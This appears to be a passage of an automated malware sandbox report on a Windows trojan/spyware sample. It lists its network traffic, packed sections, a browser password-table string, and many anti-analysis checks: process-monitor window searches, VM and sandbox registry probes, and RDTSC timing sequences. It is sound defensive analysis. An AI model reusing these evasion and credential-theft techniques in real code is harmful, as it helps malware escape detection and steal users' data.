                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49723 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: cFLK1CiiNK.exeStatic PE information: section name:
                Source: cFLK1CiiNK.exeStatic PE information: section name: .idata
                Source: cFLK1CiiNK.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_016F9C7F0_3_016F9C7F
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_0172944B0_3_0172944B
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_0172944B0_3_0172944B
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_0172944B0_3_0172944B
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_0172944B0_3_0172944B
                Source: cFLK1CiiNK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: cFLK1CiiNK.exeStatic PE information: Section: ZLIB complexity 0.9995468239379085
                Source: cFLK1CiiNK.exeStatic PE information: Section: yrxjmqat ZLIB complexity 0.9950601942848503
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327916499.0000000005D4E000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327642087.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1351072079.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: cFLK1CiiNK.exeReversingLabs: Detection: 57%
                Source: cFLK1CiiNK.exeVirustotal: Detection: 53%
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile read: C:\Users\user\Desktop\cFLK1CiiNK.exeJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: cFLK1CiiNK.exeStatic file information: File size 1865728 > 1048576
                Source: cFLK1CiiNK.exeStatic PE information: Raw size of yrxjmqat is bigger than: 0x100000 < 0x19d600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeUnpacked PE file: 0.2.cFLK1CiiNK.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yrxjmqat:EW;kamsbjdu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yrxjmqat:EW;kamsbjdu:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: cFLK1CiiNK.exeStatic PE information: real checksum: 0x1d163c should be: 0x1d4a63
                Source: cFLK1CiiNK.exeStatic PE information: section name:
                Source: cFLK1CiiNK.exeStatic PE information: section name: .idata
                Source: cFLK1CiiNK.exeStatic PE information: section name:
                Source: cFLK1CiiNK.exeStatic PE information: section name: yrxjmqat
                Source: cFLK1CiiNK.exeStatic PE information: section name: kamsbjdu
                Source: cFLK1CiiNK.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_016FCBCB push eax; retf 0_3_016FCBE1
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_01701296 push edi; retf 0_3_017012A9
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_0172C9D4 push eax; iretd 0_3_0172C9D9
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_0172C9D4 push eax; iretd 0_3_0172C9D9
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_01732737 push edx; ret 0_3_0173273A
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_0172C9D4 push eax; iretd 0_3_0172C9D9
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeCode function: 0_3_0172C9D4 push eax; iretd 0_3_0172C9D9
                Source: cFLK1CiiNK.exeStatic PE information: section name: entropy: 7.980910308787284
                Source: cFLK1CiiNK.exeStatic PE information: section name: yrxjmqat entropy: 7.954658612611576

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C7331F second address: C73323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C73323 second address: C73345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F612923D914h 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F612923D906h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C73345 second address: C73365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7187h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C73365 second address: C7337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F612923D906h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F612923D90Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C7337E second address: C733A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61286B7188h 0x00000009 popad 0x0000000a jmp 00007F61286B717Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C61554 second address: C6156F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D90Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F612923D906h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C6156F second address: C61573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C72A26 second address: C72A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C72A2A second address: C72A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C72A2E second address: C72A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D910h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C72A44 second address: C72A4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C72A4A second address: C72A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C72BE8 second address: C72BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C72BF5 second address: C72BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C72BFB second address: C72C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F61286B717Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C72C11 second address: C72C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74CCF second address: C74D30 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F61286B7188h 0x00000008 jmp 00007F61286B7182h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jnc 00007F61286B717Eh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jg 00007F61286B717Ch 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 jmp 00007F61286B7184h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F61286B717Dh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74D30 second address: C74D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74D76 second address: C74D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74D7E second address: C74DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e cld 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D18F5h], ecx 0x00000017 push 70F21BCDh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F612923D919h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74DBA second address: C74DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74DC0 second address: C74DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D911h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 70F21B4Dh 0x00000012 mov esi, eax 0x00000014 push 00000003h 0x00000016 mov edx, dword ptr [ebp+122D2C47h] 0x0000001c push 00000000h 0x0000001e mov dl, 3Dh 0x00000020 push 00000003h 0x00000022 mov dh, 69h 0x00000024 cld 0x00000025 push 9DBA000Ah 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jc 00007F612923D906h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74DFF second address: C74E4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F61286B7176h 0x0000000d je 00007F61286B7176h 0x00000013 popad 0x00000014 popad 0x00000015 xor dword ptr [esp], 5DBA000Ah 0x0000001c xor di, 4F7Bh 0x00000021 xor dl, 00000049h 0x00000024 lea ebx, dword ptr [ebp+1244FBF6h] 0x0000002a mov dword ptr [ebp+122D1BE2h], eax 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F61286B7188h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74E93 second address: C74F18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F612923D908h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F612923D908h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1AE4h], esi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F612923D908h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 push eax 0x0000004a jmp 00007F612923D911h 0x0000004f pop edx 0x00000050 mov edi, dword ptr [ebp+122D2C0Bh] 0x00000056 call 00007F612923D909h 0x0000005b jl 00007F612923D914h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74F18 second address: C74F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74F1C second address: C74FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F612923D918h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 jns 00007F612923D916h 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b jmp 00007F612923D90Fh 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F612923D90Bh 0x00000028 popad 0x00000029 popad 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f jmp 00007F612923D90Ch 0x00000034 jo 00007F612923D90Ch 0x0000003a je 00007F612923D906h 0x00000040 popad 0x00000041 pop eax 0x00000042 mov esi, dword ptr [ebp+122D2ABBh] 0x00000048 push 00000003h 0x0000004a push 00000000h 0x0000004c clc 0x0000004d push 00000003h 0x0000004f mov dword ptr [ebp+122D1909h], edi 0x00000055 push 50F132B3h 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C74FB5 second address: C74FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C75047 second address: C75051 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C75051 second address: C7506A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F61286B717Ch 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C7506A second address: C75074 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C75074 second address: C7507A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C7507A second address: C7510F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D916h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ecx, dword ptr [ebp+122D2AAFh] 0x00000012 push 00000000h 0x00000014 mov edx, dword ptr [ebp+122D1BF1h] 0x0000001a push 8214E4BBh 0x0000001f jmp 00007F612923D90Eh 0x00000024 add dword ptr [esp], 7DEB1BC5h 0x0000002b jp 00007F612923D90Ch 0x00000031 mov edi, dword ptr [ebp+122D2A2Bh] 0x00000037 push 00000003h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F612923D908h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 push 00000000h 0x00000055 mov esi, dword ptr [ebp+122D2B83h] 0x0000005b mov edx, dword ptr [ebp+122D2A07h] 0x00000061 push 00000003h 0x00000063 mov si, cx 0x00000066 push 54E3DBC6h 0x0000006b pushad 0x0000006c push ecx 0x0000006d jns 00007F612923D906h 0x00000073 pop ecx 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C86951 second address: C86966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F61286B717Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C936DE second address: C936EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F612923D908h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C93AFB second address: C93B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C93B01 second address: C93B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F612923D917h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C93B20 second address: C93B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F61286B7183h 0x0000000c popad 0x0000000d push esi 0x0000000e pushad 0x0000000f jl 00007F61286B7176h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F61286B7180h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jp 00007F61286B7176h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C93B62 second address: C93B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C93B66 second address: C93B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C93E78 second address: C93E92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F612923D906h 0x00000009 jmp 00007F612923D90Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C93E92 second address: C93EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F61286B7178h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jc 00007F61286B7176h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C93EAD second address: C93EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C94131 second address: C94135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C94135 second address: C94139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
